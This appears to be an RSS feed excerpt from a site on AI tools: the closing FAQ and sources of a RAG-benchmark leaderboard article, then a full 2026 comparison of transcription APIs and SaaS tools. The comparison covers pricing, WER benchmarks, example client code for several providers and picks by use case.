<p>BEIR tests retrieval models across 18 diverse datasets covering web, biomedical, legal, and scientific content. It measures zero-shot generalization - models shouldn't be fine-tuned on BEIR data before evaluation. BM25 baseline is roughly 42 NDCG@10.</p>
<h3 id="how-does-mteb-differ-from-beir">How does MTEB differ from BEIR?</h3>
<p>MTEB includes the BEIR retrieval datasets plus additional task categories (STS, classification, clustering). MTEB is broader and used to compare general embedding quality. BEIR focuses exclusively on retrieval generalization.</p>
<h3 id="what-is-ragtruth-and-why-does-it-matter">What is RAGTruth and why does it matter?</h3>
<p>RAGTruth is an 18,000-response dataset annotated for hallucination type and severity in RAG outputs. It's the standard benchmark for comparing how faithfully different LLMs stick to retrieved context when generating answers.</p>
<h3 id="is-bm25-still-relevant-for-rag">Is BM25 still relevant for RAG?</h3>
<p>Yes. Hybrid retrieval combining BM25 with dense embeddings beats pure dense retrieval on exact-match queries. Most production RAG systems use hybrid search. Pure BM25 scores around 42 NDCG@10 on BEIR, well below modern dense models, but it handles keyword precision that dense models miss.</p>
<h3 id="how-often-do-rag-benchmark-rankings-change">How often do RAG benchmark rankings change?</h3>
<p>Retrieval rankings shift 2-4 times per year as major providers release new models. The current leaders (Gemini Embedding 2, Voyage-4-large) were both released or updated in early 2026. Check this page and the <a href="https://huggingface.co/spaces/mteb/leaderboard">MTEB leaderboard on Hugging Face</a> for the latest.</p>
<hr>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://huggingface.co/spaces/mteb/leaderboard">MTEB Leaderboard - Hugging Face</a></li>
<li><a href="https://github.com/beir-cellar/beir/wiki/Leaderboard">BEIR Benchmark - GitHub</a></li>
<li><a href="https://blog.voyageai.com/2026/01/15/voyage-4/">Voyage 4 Model Family Announcement</a></li>
<li><a href="https://blog.voyageai.com/2026/03/03/moe-voyage-4-large/">Voyage-4-large MoE Architecture Blog</a></li>
<li><a href="https://blog.voyageai.com/2025/05/20/voyage-3-5/">Voyage 3.5 Announcement</a></li>
<li><a href="https://huggingface.co/nvidia/NV-Embed-v2">NV-Embed-v2 on Hugging Face</a></li>
<li><a href="https://developer.nvidia.com/blog/nvidia-text-embedding-model-tops-mteb-leaderboard/">NVIDIA NV-Embed MTEB Announcement</a></li>
<li><a href="https://project-miracl.github.io/">MIRACL Benchmark Project</a></li>
<li><a href="https://arxiv.org/abs/2502.13595">MMTEB: Massive Multilingual Text Embedding Benchmark - arXiv</a></li>
<li><a href="https://aclanthology.org/2024.acl-long.585/">RAGTruth - ACL 2024</a></li>
<li><a href="https://arxiv.org/abs/2603.10765">RAGPerf: End-to-End RAG Benchmarking Framework - arXiv</a></li>
<li><a href="https://microsoft.github.io/MSMARCO-Passage-Ranking-Submissions/leaderboard/">MS MARCO Passage Ranking Leaderboard</a></li>
<li><a href="https://github.com/facebookresearch/KILT">KILT Benchmark - GitHub</a></li>
<li><a href="https://hotpotqa.github.io/">HotpotQA Dataset</a></li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Leaderboards</category><media:content url="https://awesomeagents.ai/images/leaderboards/rag-benchmarks-leaderboard_hu_a72ed34d564042be.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/leaderboards/rag-benchmarks-leaderboard_hu_a72ed34d564042be.jpg" width="1200" height="675"/></item><item><title>Best AI Transcription Tools 2026: APIs and Services Ranked</title><link>https://awesomeagents.ai/tools/best-ai-transcription-tools-2026/</link><pubDate>Fri, 17 Apr 2026 13:23:22 +0200</pubDate><guid>https://awesomeagents.ai/tools/best-ai-transcription-tools-2026/</guid><description>&lt;p>Transcription is one of the most deceptively hard problems in AI. The WER numbers vendors publish look great until you feed in a noisy podcast recording with two overlapping speakers and a few proper nouns. Then the real differences show up.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>Transcription is one of the most deceptively hard problems in AI. The WER numbers vendors publish look great until you feed in a noisy podcast recording with two overlapping speakers and a few proper nouns. Then the real differences show up.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>Deepgram Nova-3 is the fastest and most cost-effective API for developers - $0.0043/min for pre-recorded English with native streaming support</li>
<li>AssemblyAI Universal-3 Pro leads on accuracy for challenging audio - 5.72% average WER across English benchmarks per its February 2026 evaluation</li>
<li>OpenAI's gpt-4o-transcribe at $0.006/min is the easiest drop-in for teams already on the OpenAI stack, with strong accuracy but no real-time streaming parity</li>
</ul>
</div>
<p>These tools are not meeting assistants. If you need AI to join a Zoom and take notes, that's a separate category - we cover it in <a href="/tools/best-ai-meeting-assistants-2026/">Best AI Meeting Assistants 2026</a>. The tools here are dedicated transcription engines for podcasters, legal firms, video producers, researchers, and developers building voice pipelines. The typical use case is a file upload or a live audio stream that needs to come back as clean, speaker-attributed text with timestamps.</p>
<p>The comparison spans API-first services (Deepgram, AssemblyAI, OpenAI, Google Cloud, Rev AI), professional SaaS tools (Sonix, Descript, HappyScribe, Trint), and the open-source Whisper option for teams that want full control.</p>
<h2 id="why-this-category-is-different-from-meeting-ai">Why This Category Is Different from Meeting AI</h2>
<p>Meeting assistants layer on top of a transcription engine and add scheduling, action items, and CRM sync. Transcription tools are lower in the stack. A developer building a podcast hosting platform doesn't need summaries - they need clean SRT files and a reliable API. A court reporting firm needs verbatim accuracy above 98% and a clear audit trail.</p>
<p>The tradeoffs matter differently here. Latency for batch transcription doesn't matter much; accuracy and format support do. For real-time captioning or live subtitles, streaming latency is everything. Speaker diarization quality is critical for any multi-speaker audio - interview recordings, depositions, panel discussions.</p>
<p>For teams also needing text-to-speech or voice synthesis, our <a href="/tools/best-ai-voice-generators-2026/">Best AI Voice Generators 2026</a> covers the output side of the pipeline.</p>
<hr>
<h2 id="accuracy-benchmarks-what-the-numbers-actually-mean">Accuracy Benchmarks: What the Numbers Actually Mean</h2>
<p>Word Error Rate (WER) is the standard metric, but vendor-published benchmarks are almost always optimistic. Most use clean audio at moderate speeds with standard vocabulary. Real-world audio - phone calls, noisy environments, heavy accents, technical jargon - typically comes in 2x to 4x worse than the headline number.</p>
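<p>WER itself is simple to compute: word-level edit distance between the hypothesis and the reference transcript, divided by the number of reference words. A minimal sketch:</p>
<pre><code class="language-python"># Word Error Rate: word-level edit distance between hypothesis and reference,
# divided by the reference length.
def wer(reference, hypothesis):
    ref = reference.lower().split()
    hyp = hypothesis.lower().split()
    # dp[i][j] = edits to turn the first i reference words into the first j hypothesis words
    dp = [[0] * (len(hyp) + 1) for _ in range(len(ref) + 1)]
    for i in range(len(ref) + 1):
        dp[i][0] = i
    for j in range(len(hyp) + 1):
        dp[0][j] = j
    for i in range(1, len(ref) + 1):
        for j in range(1, len(hyp) + 1):
            cost = 0 if ref[i - 1] == hyp[j - 1] else 1
            dp[i][j] = min(dp[i - 1][j] + 1,         # deletion
                           dp[i][j - 1] + 1,         # insertion
                           dp[i - 1][j - 1] + cost)  # substitution
    return dp[len(ref)][len(hyp)] / len(ref)

# One substitution in a ten-word reference is a 10% WER:
ref = "the quick brown fox jumps over the lazy sleeping dog"
print(wer(ref, "the quick brown fox jumps over the lazy sleepy dog"))  # 0.1
</code></pre>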
<p>AssemblyAI publishes one of the more credible independent benchmark reports, running evaluations across 250+ hours of audio from 26 datasets. Their February 2026 results cover English and multilingual performance.</p>
<p><strong>English WER across major providers (AssemblyAI benchmark, February 2026):</strong></p>
<table>
  <thead>
      <tr>
          <th>Provider</th>
          <th>CommonVoice</th>
          <th>Podcast</th>
          <th>Noisy Audio</th>
          <th>LibriSpeech Clean</th>
          <th>Average</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>AssemblyAI</td>
          <td>4.13%</td>
          <td>6.65%</td>
          <td>9.97%</td>
          <td>1.46%</td>
          <td><strong>5.72%</strong></td>
      </tr>
      <tr>
          <td>ElevenLabs</td>
          <td>5.38%</td>
          <td>10.90%</td>
          <td>13.72%</td>
          <td>2.17%</td>
          <td>7.08%</td>
      </tr>
      <tr>
          <td>OpenAI</td>
          <td>8.52%</td>
          <td>10.32%</td>
          <td>11.63%</td>
          <td>2.28%</td>
          <td>7.45%</td>
      </tr>
      <tr>
          <td>Amazon</td>
          <td>5.16%</td>
          <td>11.23%</td>
          <td>24.73%</td>
          <td>2.05%</td>
          <td>8.14%</td>
      </tr>
      <tr>
          <td>Deepgram</td>
          <td>10.45%</td>
          <td>10.23%</td>
          <td>14.12%</td>
          <td>2.56%</td>
          <td>8.38%</td>
      </tr>
      <tr>
          <td>Microsoft</td>
          <td>7.76%</td>
          <td>11.37%</td>
          <td>14.26%</td>
          <td>2.32%</td>
          <td>8.14%</td>
      </tr>
  </tbody>
</table>
<p>The Noisy Audio column is where things fall apart. Amazon's 24.73% WER on noisy audio is nearly unusable for real-world podcast or field recording work. Deepgram's own Nova-3 benchmark reports a 5.26% batch WER on its internal test set - the discrepancy with AssemblyAI's 8.38% average illustrates exactly why cross-vendor benchmarks are valuable.</p>
<p>For multilingual audio, ElevenLabs edges ahead with a 8.75% average against AssemblyAI's 9.78%, though both are well ahead of Deepgram (12.82%) and Microsoft (12.62%).</p>
<p>These benchmarks were published by AssemblyAI, so treat them with appropriate skepticism - they have an obvious interest in favorable numbers. That said, their methodology is documented and they include datasets where they don't win.</p>
<p><img src="/images/tools/best-ai-transcription-tools-2026-podcast.jpg" alt="A man wearing headphones recording at a professional microphone setup">
<em>Dedicated transcription APIs are the right tool for podcast producers, interviewers, and media teams - not meeting bots.</em>
<small>Source: pexels.com</small></p>
<hr>
<h2 id="api-first-transcription-engines">API-First Transcription Engines</h2>
<h3 id="deepgram-nova-3">Deepgram Nova-3</h3>
<p>Deepgram's Nova-3 is the most developer-friendly option in this space. The API design is clean, documentation is thorough, and the streaming latency is genuinely low - Deepgram claims 300ms time-to-first-token for real-time streaming. For anyone building a voice agent, live captioning service, or anything requiring sub-second response, Nova-3 is the practical default.</p>
<p><strong>Pricing (Pay As You Go):</strong></p>
<ul>
<li>Pre-recorded English: $0.0043/min ($0.26/hr)</li>
<li>Streaming English: $0.0077/min ($0.46/hr)</li>
<li>Pre-recorded multilingual: $0.0052/min ($0.31/hr)</li>
<li>Speaker diarization add-on: +$0.0020/min ($0.12/hr)</li>
<li>Smart formatting: included</li>
</ul>
<p>The Growth plan (annual commitment, $4K+ minimum) cuts pre-recorded English to $0.0036/min. Nova-3 supports 36+ languages. Output formats include JSON with word-level timestamps, SRT, and VTT. DOCX export requires post-processing.</p>
<p>Where Nova-3 loses ground is on noisy or heavily accented audio, where AssemblyAI's numbers pull ahead. Deepgram also publishes their own benchmarks claiming a 30% WER advantage over competitors - the conflict between their numbers and AssemblyAI's data is unresolved. Test on your own audio.</p>
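<p>To make the integration surface concrete, here is a hedged sketch of a batch request against Deepgram's pre-recorded endpoint using plain HTTP. The endpoint and the <code>model</code>, <code>smart_format</code>, and <code>diarize</code> parameters follow Deepgram's documented API; the file name is illustrative and the response shape is worth verifying against the current docs.</p>
<pre><code class="language-python"># Hedged sketch: batch transcription via Deepgram's pre-recorded /v1/listen endpoint.
import os
import requests

DEEPGRAM_API_KEY = os.environ["DEEPGRAM_API_KEY"]

with open("episode.mp3", "rb") as audio:  # illustrative file name
    resp = requests.post(
        "https://api.deepgram.com/v1/listen",
        params={"model": "nova-3", "smart_format": "true", "diarize": "true"},
        headers={
            "Authorization": f"Token {DEEPGRAM_API_KEY}",
            "Content-Type": "audio/mpeg",
        },
        data=audio,
    )
resp.raise_for_status()

result = resp.json()
# Word-level timestamps and speaker labels sit alongside the transcript in the JSON.
print(result["results"]["channels"][0]["alternatives"][0]["transcript"])
</code></pre>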
<h3 id="assemblyai-universal-3-pro">AssemblyAI Universal-3 Pro</h3>
<p>AssemblyAI's current flagship model adds structured formatting, keyterm prompting, and medical mode on top of base transcription. The Universal-2 model (still available) remains solid for most use cases at a lower price.</p>
<p><strong>Pricing:</strong></p>
<ul>
<li>Universal-3 Pro (pre-recorded): $0.21/hr base</li>
<li>Universal-3 Pro Streaming: $0.45/hr base</li>
<li>Universal-2 (pre-recorded): $0.15/hr base</li>
<li>Speaker diarization: +$0.02/hr (pre-recorded), +$0.12/hr (streaming)</li>
<li>Medical mode: +$0.15/hr on top of base</li>
</ul>
<p>The feature set is the strongest here. Speaker identification, sentiment analysis, entity detection, PII redaction, and summarization are all available as add-ons. Entities and PII redaction cost extra but the API is clean and well-documented. AssemblyAI's Universal-3 Pro Medical model claims a 4.97% Missed Entity Rate on clinical terminology - medical practices and legal firms with domain vocabulary should test this tier specifically.</p>
<p>The free tier includes $50 in credits with no card required.</p>
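<p>For orientation, AssemblyAI's REST flow is upload, create a transcript job, then poll until it finishes. A hedged sketch of that v2 flow is below - the file name is illustrative, and the parameter that selects a specific model tier (Universal-3 Pro vs Universal-2) should be checked against the current docs.</p>
<pre><code class="language-python"># Hedged sketch of AssemblyAI's upload -> transcribe -> poll flow (v2 REST API).
import os
import time
import requests

API_KEY = os.environ["ASSEMBLYAI_API_KEY"]
BASE = "https://api.assemblyai.com/v2"
headers = {"authorization": API_KEY}

# 1. Upload the local file and get a private URL back.
with open("deposition.wav", "rb") as f:  # illustrative file name
    upload = requests.post(f"{BASE}/upload", headers=headers, data=f).json()

# 2. Create a transcription job with speaker diarization enabled.
job = requests.post(
    f"{BASE}/transcript",
    headers=headers,
    json={"audio_url": upload["upload_url"], "speaker_labels": True},
).json()

# 3. Poll until the job completes or errors out.
while True:
    status = requests.get(f"{BASE}/transcript/{job['id']}", headers=headers).json()
    if status["status"] in ("completed", "error"):
        break
    time.sleep(5)

print(status.get("text") or status.get("error"))
</code></pre>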
<h3 id="openai-gpt-4o-transcribe--whisper-1">OpenAI (gpt-4o-transcribe / Whisper-1)</h3>
<p>OpenAI now offers two transcription tiers, with the gpt-4o family superseding the original Whisper-1 endpoint as the recommended path.</p>
<p><strong>Pricing:</strong></p>
<ul>
<li>gpt-4o-transcribe: $0.006/min ($0.36/hr)</li>
<li>gpt-4o-mini-transcribe: $0.003/min ($0.18/hr)</li>
</ul>
<p>The gpt-4o-transcribe model reaches 2.46% WER on FLEURS benchmarks - one of the lowest published numbers. Real-world performance is strong, especially on clear speech and standard English. It struggles more on heavy accents and noisy environments than the benchmark suggests.</p>
<p>The main limitation is the API design. There's no native streaming model comparable to Deepgram. You upload a file and get back text. For batch workflows - transcribing podcast episodes, video libraries, interview archives - it works well. For real-time use cases, the architecture requires workarounds.</p>
<p>File size limit is 25MB per request. Supported formats include MP3, MP4, WAV, WEBM. Output formats: JSON, SRT, VTT, or plain text. Speaker diarization is available via the gpt-4o-transcribe endpoint but was in beta as of early 2026.</p>
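<p>For batch workflows the integration is a single call through the official Python SDK. A minimal sketch, assuming the <code>OPENAI_API_KEY</code> environment variable is set and using an illustrative file name - note that available <code>response_format</code> values differ between Whisper-1 and the gpt-4o models, so check the docs before requesting SRT or VTT directly from the API.</p>
<pre><code class="language-python"># Hedged sketch: batch transcription with the official openai Python SDK.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

# Files must stay under the 25MB per-request limit; split longer audio first.
with open("interview.mp3", "rb") as audio_file:  # illustrative file name
    transcript = client.audio.transcriptions.create(
        model="gpt-4o-transcribe",
        file=audio_file,
        response_format="text",  # plain text keeps the example model-agnostic
    )

print(transcript)  # a plain string when response_format="text"
</code></pre>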
<h3 id="rev-ai">Rev AI</h3>
<p>Rev operates both an AI transcription API and a human transcription service, which is genuinely useful for high-stakes work.</p>
<p><strong>Pricing:</strong></p>
<ul>
<li>Reverb ASR (English): $0.20/hr</li>
<li>Reverb Turbo: $0.10/hr</li>
<li>Reverb Foreign Language: $0.30/hr (55+ languages)</li>
<li>Whisper Fusion / Whisper Large: $0.005/min ($0.30/hr)</li>
<li>Human transcription: $1.99/min ($119.40/hr)</li>
<li>Free tier: 5 hours equivalent in free credits</li>
</ul>
<p>The Reverb model is Rev's proprietary ASR. Whisper Fusion and Whisper Large are exactly what the names suggest: Whisper-based models hosted by Rev. The human transcription option at $1.99/min is expensive but delivers 99%+ accuracy with a human review - appropriate for legal depositions, medical records, or any context where errors have real consequences.</p>
<p>The API is well-documented. Speaker diarization and confidence scores are included. Rev supports SRT, VTT, JSON, and text output.</p>
<h3 id="google-cloud-speech-to-text">Google Cloud Speech-to-Text</h3>
<p>Google's STT API offers two versions - V1 and V2. V2 adds Chirp, their multilingual model, and multi-region data residency.</p>
<p><strong>Pricing:</strong></p>
<ul>
<li>Standard models: $0.024/min ($1.44/hr)</li>
<li>Enhanced models: $0.036/min ($2.16/hr)</li>
<li>Data logging opt-out: +40% to listed rates</li>
<li>First 60 minutes per month: free</li>
</ul>
<p>At $1.44/hr for standard, Google is more expensive than Deepgram, AssemblyAI, or OpenAI for equivalent accuracy. The real cost is higher once you factor in the full GCP stack - Cloud Storage, Cloud Functions, and egress fees can double the effective per-hour rate. Google's WER benchmark numbers (Microsoft-level, around 8-9% average) don't justify the price premium over dedicated speech APIs.</p>
<p>Google STT makes the most sense if you're already deep in GCP and the integration cost outweighs the per-minute savings from switching providers.</p>
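<p>If you do go this route, transcription runs through the google-cloud-speech client library. A hedged V1 sketch, assuming Application Default Credentials are configured and the audio is staged in an illustrative Cloud Storage bucket - files longer than about a minute have to go through the long-running method.</p>
<pre><code class="language-python"># Hedged sketch: long-running batch recognition with the google-cloud-speech V1 client.
from google.cloud import speech

client = speech.SpeechClient()  # uses Application Default Credentials

config = speech.RecognitionConfig(
    language_code="en-US",
    enable_automatic_punctuation=True,
    enable_word_time_offsets=True,  # word-level timestamps
)
# Illustrative bucket path - long audio has to live in Cloud Storage.
audio = speech.RecognitionAudio(uri="gs://my-transcripts-bucket/interview.flac")

operation = client.long_running_recognize(config=config, audio=audio)
response = operation.result(timeout=600)

for result in response.results:
    print(result.alternatives[0].transcript)
</code></pre>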
<p><img src="/images/tools/best-ai-transcription-tools-2026-microphone.jpg" alt="A professional condenser microphone with headset in a recording studio">
<em>Speaker diarization accuracy matters most for multi-voice recordings - depositions, interviews, panels.</em>
<small>Source: pexels.com</small></p>
<hr>
<h2 id="professional-saas-transcription-tools">Professional SaaS Transcription Tools</h2>
<p>These tools trade API flexibility for a polished UI and editorial workflow. They're aimed at podcasters, journalists, researchers, and content teams rather than developers.</p>
<h3 id="sonix">Sonix</h3>
<p>Sonix is the strongest editor-focused option. The transcript editor is browser-based, clean, and genuinely useful - you can click any word to jump to that moment in the audio, assign speaker names, and export with word-level timestamps intact.</p>
<p><strong>Pricing:</strong></p>
<ul>
<li>Standard (pay-per-use): $10/hr</li>
<li>Premium: $5/hr + $22/user/month subscription</li>
<li>Free trial: 30 minutes</li>
</ul>
<p>Sonix supports 53+ languages and exports SRT, VTT, TXT, and DOCX. Translation is available as an add-on. Accuracy is claimed at up to 99%, which likely refers to best-case English conditions. For podcasters and researchers who want a clean editing workflow without developer overhead, Sonix is hard to beat at this price.</p>
<h3 id="descript">Descript</h3>
<p>Descript takes a different approach. Rather than positioning itself as a transcription service, it's a video and audio editor where the transcript is the primary editing interface. Delete words from the transcript and the corresponding audio gets cut. It's a genuinely novel workflow for creators.</p>
<p><strong>Pricing (post-September 2025 restructure):</strong></p>
<ul>
<li>Free: 60 media minutes/month + 100 AI credits (one-time)</li>
<li>Paid tiers start at $16/month (Hobbyist)</li>
<li>Creator and Business tiers add more media minutes and AI credits</li>
</ul>
<p>Descript uses media minutes (upload/recording) and AI credits (AI processing) as its two resource pools since the September 2025 pricing overhaul. If you're a solo creator doing under an hour of content per month, the Hobbyist tier at $16/month covers most workflows. For heavier users, calculate your media minute consumption before committing.</p>
<p>Speaker labeling, noise reduction, and studio sound processing are built in. Export formats include SRT and VTT for captions. It isn't designed for bulk API ingestion - it's a creative tool for video and podcast producers.</p>
<h3 id="happyscribe">HappyScribe</h3>
<p>HappyScribe is a European-focused transcription service with strong subtitle support. It's popular among documentary filmmakers and broadcasters who need subtitle workflows alongside transcription.</p>
<p><strong>Pricing:</strong></p>
<ul>
<li>Basic: €8.50/month (annual) - 120 AI minutes/month</li>
<li>Pro: €19/month (annual) - 600 AI minutes/month</li>
<li>Business: €59/month (annual) - 6,000 AI minutes/month</li>
<li>Pay-per-use top-ups: €0.20/min</li>
<li>Human proofreading: from €1.75/min</li>
</ul>
<p>All plans include unlimited meeting recording (up to 45 minutes per session on Basic). HappyScribe exports SRT, VTT, TXT, and DOCX. Human proofreading is available as an add-on, useful for broadcast media where accuracy requirements are high. Language support covers 60+ languages with subtitle timing built into the workflow.</p>
<p>The UI is polished and aimed at non-technical users. There's no developer API comparable to Deepgram or AssemblyAI.</p>
<h3 id="trint">Trint</h3>
<p>Trint targets newsrooms and media organizations. It's one of the older players in AI transcription - founded in 2014 - and has built out collaboration features that matter to editorial teams.</p>
<p><strong>Pricing:</strong></p>
<ul>
<li>Starter: $52-80/month per seat (7 files/month)</li>
<li>Advanced: $60-100/month per seat (unlimited transcriptions)</li>
<li>Enterprise: custom</li>
</ul>
<p>Trint supports 31+ languages and has ISO 27001 certification, which matters for enterprise and media buyers. The AI assistant can create 400-word overviews of long transcripts. Real-time collaboration and API access are Enterprise-only features.</p>
<p>The per-seat subscription model is expensive compared to usage-based alternatives. For a team doing light transcription work, Trint's minimum viable plan at $52/month per user adds up fast. It earns its price in newsroom environments where the collaboration and security certifications matter.</p>
<hr>
<h2 id="the-whisper-open-source-option">The Whisper Open-Source Option</h2>
<p>Whisper (originally released by OpenAI in 2022) remains the reference point for open-source transcription. The large-v3 model delivers competitive accuracy for many use cases. Self-hosting is the draw - your audio never leaves your infrastructure.</p>
<p>The reality of self-hosting Whisper at scale isn't simple. You need GPU infrastructure, audio chunking logic for long files (Whisper processes in 30-second segments), concurrent request handling, and ongoing model management. Processing 1 hour of audio on an AWS GPU instance costs roughly $0.56 using the large model - already above Deepgram's $0.26/hr batch rate, and that's before the infrastructure and engineering overhead is factored in.</p>
<p>For a solo developer or researcher transcribing occasional files, running <code>whisper audio.mp3 --model large</code> locally is perfectly practical. For production workloads above a few hundred hours per month, the managed APIs offer better economics once engineering time is priced in.</p>
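<p>The same run through the Python package rather than the CLI looks like the sketch below - a minimal example assuming the openai-whisper package and ffmpeg are installed, with an illustrative file name.</p>
<pre><code class="language-python"># Local Whisper run - the Python equivalent of `whisper audio.mp3 --model large`.
import whisper  # pip install openai-whisper; ffmpeg must be on the PATH

model = whisper.load_model("large-v3")  # downloads roughly 3 GB of weights on first use
result = model.transcribe("audio.mp3")  # illustrative file name

print(result["text"])

# Segment-level timestamps, useful for building SRT/VTT downstream:
for seg in result["segments"]:
    print(f'{seg["start"]:7.2f} -> {seg["end"]:7.2f}  {seg["text"]}')
</code></pre>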
<p>Whisper doesn't support native real-time streaming. It's a batch-only option out of the box.</p>
<hr>
<h2 id="comparison-table">Comparison Table</h2>
<table>
  <thead>
      <tr>
          <th>Tool</th>
          <th>Type</th>
          <th>Price (per hr)</th>
          <th>WER (English avg)</th>
          <th>Real-Time</th>
          <th>Diarization</th>
          <th>SRT/VTT</th>
          <th>DOCX</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Deepgram Nova-3</td>
          <td>API</td>
          <td>$0.26 batch / $0.46 stream</td>
          <td>~8.4% (external)</td>
          <td>Yes</td>
          <td>+$0.12/hr</td>
          <td>Yes</td>
          <td>No (post-process)</td>
      </tr>
      <tr>
          <td>AssemblyAI Universal-3 Pro</td>
          <td>API</td>
          <td>$0.21 batch / $0.45 stream</td>
          <td>5.72%</td>
          <td>Yes</td>
          <td>+$0.02/hr</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
      <tr>
          <td>OpenAI gpt-4o-transcribe</td>
          <td>API</td>
          <td>$0.36</td>
          <td>2.46% (FLEURS)</td>
          <td>Limited</td>
          <td>Beta</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Rev AI (Reverb)</td>
          <td>API</td>
          <td>$0.20</td>
          <td>Not published</td>
          <td>Yes</td>
          <td>Included</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Rev AI (Human)</td>
          <td>Human</td>
          <td>$119.40</td>
<td>~1% (99%+ accuracy)</td>
          <td>No</td>
          <td>Included</td>
          <td>Yes</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>Google Cloud STT</td>
          <td>API</td>
          <td>$1.44 standard</td>
          <td>~8-9%</td>
          <td>Yes</td>
          <td>Included (V2)</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Sonix</td>
          <td>SaaS</td>
          <td>$10</td>
<td>~1% (claimed 99% accuracy)</td>
          <td>No</td>
          <td>Yes</td>
          <td>Yes</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>Descript</td>
          <td>SaaS</td>
          <td>$16+/mo plans</td>
          <td>Not published</td>
          <td>No</td>
          <td>Yes</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
      <tr>
          <td>HappyScribe</td>
          <td>SaaS</td>
          <td>€0.20/min (€12/hr)</td>
          <td>Not published</td>
          <td>No</td>
          <td>Yes</td>
          <td>Yes</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>Trint</td>
          <td>SaaS</td>
          <td>$52-100/seat/mo</td>
          <td>Not published</td>
          <td>Enterprise</td>
          <td>Yes</td>
          <td>Yes</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>Whisper (self-hosted)</td>
          <td>Open Source</td>
          <td>~$0.56/hr (GPU)</td>
          <td>Competitive</td>
          <td>No</td>
          <td>No</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
  </tbody>
</table>
<p><em>WER numbers from published benchmarks where available. The FLEURS score for OpenAI reflects clean read speech - real-world WER runs higher. &quot;Not published&quot; means no independent external benchmark was found at time of writing.</em></p>
<hr>
<h2 id="best-pick-by-use-case">Best Pick by Use Case</h2>
<p><strong>Developers building voice pipelines:</strong> Deepgram Nova-3. The streaming API, low latency, and clean documentation are the right fit. Start with Pay As You Go at $0.0043/min and move to Growth pricing if volume justifies it.</p>
<p><strong>Teams needing maximum accuracy on challenging audio:</strong> AssemblyAI Universal-3 Pro. The edge in noisy audio and medical/legal vocabulary is measurable. The $0.21/hr base rate is reasonable given the accuracy differential.</p>
<p><strong>Already on OpenAI stack:</strong> gpt-4o-transcribe at $0.006/min. No new vendor onboarding, strong accuracy on clean audio, SRT and VTT output included. Acceptable tradeoff for most batch workflows.</p>
<p><strong>Podcast and video creators:</strong> Sonix for a dedicated transcription workflow, or Descript if you want to edit your content by editing the transcript. Both are consumer-grade tools that don't require API work.</p>
<p><strong>High-stakes accuracy (legal, medical, regulatory):</strong> Rev AI's human transcription at $1.99/min, or AssemblyAI Universal-3 Pro Medical mode combined with human review. Machine accuracy above 99% on clean audio isn't guaranteed by any provider - a human review layer remains necessary for documents with legal weight.</p>
<p><strong>European/broadcast media:</strong> HappyScribe for the subtitle workflow and GDPR-compliant hosting.</p>
<p><strong>Maximum data control:</strong> Self-hosted Whisper large-v3. Accept the infrastructure overhead and the lack of real-time streaming.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="which-transcription-api-is-most-accurate-in-2026">Which transcription API is most accurate in 2026?</h3>
<p>AssemblyAI Universal-3 Pro leads third-party English benchmarks with a 5.72% average WER (Feb 2026). OpenAI's gpt-4o-transcribe reports 2.46% WER on FLEURS, though that dataset uses clean read speech.</p>
<h3 id="does-deepgram-support-speaker-diarization">Does Deepgram support speaker diarization?</h3>
<p>Yes - speaker diarization is available as an add-on at $0.0020/min ($0.12/hr) on top of base Nova-3 pricing. It detects multiple speakers and labels segments by speaker ID.</p>
<h3 id="can-i-self-host-whisper-for-production-transcription">Can I self-host Whisper for production transcription?</h3>
<p>Yes, but at scale it requires GPU infrastructure, audio chunking logic, and concurrent request handling. For under 100 hours per month, self-hosting is cost-competitive. Above that, managed APIs are usually more economical when engineering time is factored in.</p>
<h3 id="what-output-formats-do-transcription-apis-support">What output formats do transcription APIs support?</h3>
<p>Most APIs output JSON with timestamps, plain text, SRT, and VTT. DOCX is common in SaaS tools (Sonix, HappyScribe) but not usually available from API providers without post-processing.</p>
<h3 id="which-tool-is-best-for-transcribing-non-english-audio">Which tool is best for transcribing non-English audio?</h3>
<p>ElevenLabs (8.75% multilingual WER) and AssemblyAI (9.78%) lead on multilingual benchmarks. Deepgram Nova-3 supports 36+ languages with a multilingual model at $0.0052/min pre-recorded. HappyScribe covers 60+ languages with subtitle workflow support.</p>
<hr>
<h2 id="sources">Sources</h2>
<ul>
<li><a href="https://www.assemblyai.com/benchmarks">AssemblyAI Benchmarks (February 2026)</a> - English and multilingual WER data across 26 datasets</li>
<li><a href="https://www.assemblyai.com/pricing">AssemblyAI Pricing</a> - Universal-3 Pro, Universal-2, and streaming tier pricing</li>
<li><a href="https://deepgram.com/pricing">Deepgram Pricing</a> - Nova-3 per-minute rates, diarization add-on costs</li>
<li><a href="https://developers.openai.com/api/docs/pricing">OpenAI API Pricing</a> - gpt-4o-transcribe and gpt-4o-mini-transcribe per-minute rates</li>
<li><a href="https://www.rev.ai/pricing">Rev AI Pricing</a> - Reverb ASR, Whisper options, human transcription rates</li>
<li><a href="https://www.eesel.ai/blog/happyscribe-pricing">HappyScribe Pricing Plans</a> - Subscription tiers and pay-per-use rates</li>
<li><a href="https://sonix.ai/pricing">Sonix Pricing</a> - Standard and Premium tier pricing</li>
<li><a href="https://deepgram.com/learn/introducing-nova-3-speech-to-text-api">Deepgram Introducing Nova-3</a> - Nova-3 WER benchmark (5.26%)</li>
<li><a href="https://scribewave.com/blog/openai-launches-gpt-4o-transcribe-a-powerful-yet-limited-transcription-model">OpenAI gpt-4o-transcribe Launch Coverage</a> - gpt-4o-transcribe accuracy claims and analysis</li>
